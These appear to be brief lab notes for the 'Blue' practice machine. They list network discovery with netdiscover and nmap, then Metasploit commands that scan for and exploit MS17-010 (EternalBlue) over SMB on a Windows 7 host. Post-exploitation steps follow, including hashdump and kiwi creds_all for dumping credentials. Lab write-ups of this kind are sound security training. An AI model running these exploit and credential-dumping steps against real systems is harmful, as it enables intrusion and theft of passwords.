Skip to content

Blue

sudo netdiscover -r 10.0.2.0/24
IP -> 10.0.2.6
nmap -T4 -p- -A <IP>
  • smb open
  • windows 7 Professional 7601 Service Pack 1

This means it was a possibility to be vulnerable to eternal blue 0 smb_ms17_010

Terminal window
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $IP
run

  • Run eternal blue explit to root the machine
Terminal window
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run

Can try to change the payload to meterpetrer with staged payload

Github Page Link

  • hashdump
  • getuid
  • sysinfo
  • route print
  • arp -a
  • netstat -ano
  • ps
  • enter in shell (shell)
  • kiwi
    • help
    • creds_all